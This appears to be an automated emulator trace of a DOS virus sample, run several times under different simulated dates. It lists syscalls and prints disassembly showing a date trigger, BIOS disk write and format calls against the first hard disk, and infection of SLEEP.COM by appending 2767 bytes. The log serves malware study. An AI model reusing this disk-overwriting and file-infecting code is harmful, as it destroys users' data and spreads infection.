{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:08.099431151Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:08.101098668Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:08.102731892Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:08.104299765Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:08.107484729Z 78 PC: 14390 | Find first file
2018-12-25T11:52:08.114498745Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:08.121171259Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:08.150464836Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:08.171930986Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:08.173448134Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.180798191Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:08.192237886Z 62 PC: 143b9 | Close file
2018-12-25T11:52:08.194166674Z 79 PC: 143bd | Find next file
2018-12-25T11:52:08.197397811Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.217167541Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.228619604Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.235620252Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.237539895Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.244645456Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.255196133Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.257052198Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.258832027Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.2623211Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.270398552Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.283841595Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.285454343Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.2939955Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.320617975Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.322993328Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.327608376Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.333004133Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.342349602Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.351059199Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.353467497Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.361123449Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.376242653Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.379786875Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.383157846Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.389734507Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.401889326Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.409721296Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.411672907Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.420317709Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.431793578Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.435084771Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.439370971Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.446518103Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.458074767Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.466813233Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.469227734Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.476782343Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.48806459Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.491725464Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.495019619Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.502462686Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.514860179Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.522580203Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.524646548Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.532804114Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.546448557Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.549064997Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.552662312Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.558901159Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.57088694Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.579467628Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.581316046Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.588912331Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:08.591099499Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:08.594568863Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:08.596540142Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:08.598483154Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.607703779Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:08.609741112Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:08.619686836Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:08.623431724Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:08.626951172Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:08.629020916Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:08.63251433Z 62 PC: 1448c | Close file
2018-12-25T11:52:08.642461976Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:08.654128865Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.666413073Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.668374151Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.671472834Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:08.677869314Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:08.680128437Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:08.693413349Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:08.695702509Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:08.702831108Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:08.490800126Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:08.492230586Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:08.494296562Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:08.496609576Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:08.500406126Z 78 PC: 14390 | Find first file
2018-12-25T11:52:08.506493529Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:08.510217012Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:08.524184042Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:08.541131102Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:08.542971757Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.549521281Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:08.559826122Z 62 PC: 143b9 | Close file
2018-12-25T11:52:08.56187938Z 79 PC: 143bd | Find next file
2018-12-25T11:52:08.564761403Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.571585787Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.581803201Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.588530526Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.596407618Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.601930938Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.612411523Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.614529789Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.617313645Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.623044707Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.637844769Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.644431074Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.645767226Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.652699674Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.662343024Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.664095173Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.666460841Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.676305151Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.683332646Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.69052586Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.691806077Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.699623747Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.711631446Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.71292865Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.715108196Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.719128582Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.727058469Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.736795785Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.742414558Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.748612321Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.758461096Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.761544079Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.764400136Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.772497832Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.782755363Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.790447832Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.791755462Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.798181036Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.8119798Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.814020077Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.816875764Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.823806949Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.833820842Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.840628056Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.843342024Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.849755107Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.860224061Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.862992495Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.865561717Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.876936688Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.018463367Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.02293228Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.024213022Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.090597138Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:09.09274269Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:09.096050171Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:09.098596Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:09.101384916Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.10828166Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:09.110735529Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:09.228432881Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:09.231021158Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:09.235623227Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:09.238842171Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:09.240654687Z 62 PC: 1448c | Close file
2018-12-25T11:52:09.24884617Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:09.269510564Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.274628493Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.276336723Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.279779779Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:09.285914933Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:09.287683221Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:09.296676783Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:09.29879785Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:09.303053639Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:08.854548087Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:08.856471551Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:08.85879298Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:08.861176135Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:08.863560349Z 78 PC: 14390 | Find first file
2018-12-25T11:52:08.870782479Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:08.876822463Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:09.229210131Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:09.239459009Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:09.241889033Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.2621426Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:09.273680298Z 62 PC: 143b9 | Close file
2018-12-25T11:52:09.275808731Z 79 PC: 143bd | Find next file
2018-12-25T11:52:09.278812282Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.285633628Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.296025222Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.302882084Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.304906544Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.312575868Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.323527899Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.32584518Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.330203017Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.336971583Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.348764871Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.358070508Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.359999833Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.365298033Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.37412155Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.378019457Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.38069243Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.387735648Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.408040821Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.414895109Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.417418476Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.42417029Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.446946196Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.449359458Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.454684281Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.460933546Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.472660912Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.480085593Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.481546511Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.488539552Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.499728492Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.501766751Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.504603634Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.511435538Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.522229619Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.537486601Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.540300871Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.546769561Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.557417679Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.560560261Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.563531097Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.569451691Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.580245047Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.587330343Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.589002087Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.597076645Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.6153933Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.618502687Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.621867509Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.628710471Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.638578224Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.646077291Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.647773763Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.650630089Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:09.653066122Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:09.656701829Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:09.658413124Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:09.660251Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.664296215Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:09.666748835Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:09.678862884Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:09.681678669Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:09.684738527Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:09.686412182Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:09.689316294Z 62 PC: 1448c | Close file
2018-12-25T11:52:09.697001629Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:09.707688284Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.713532198Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.715424453Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.718183152Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:09.724638469Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:09.726495238Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:09.734557507Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:09.738267241Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:09.742865264Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":15,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:08.823311681Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:08.825419657Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:08.827906185Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:08.830341272Z 9 PC: 14320 | Display string (Could not find end pointer)
2018-12-25T11:52:08.948572383Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:08.952980277Z 78 PC: 14390 | Find first file
2018-12-25T11:52:08.95719105Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:08.964599252Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:09.229169295Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:09.235806038Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:09.238181041Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.245704703Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:09.255897445Z 62 PC: 143b9 | Close file
2018-12-25T11:52:09.258818125Z 79 PC: 143bd | Find next file
2018-12-25T11:52:09.262097004Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.267982757Z 67 PC: 143a9 | Get or set file attributes (See above)
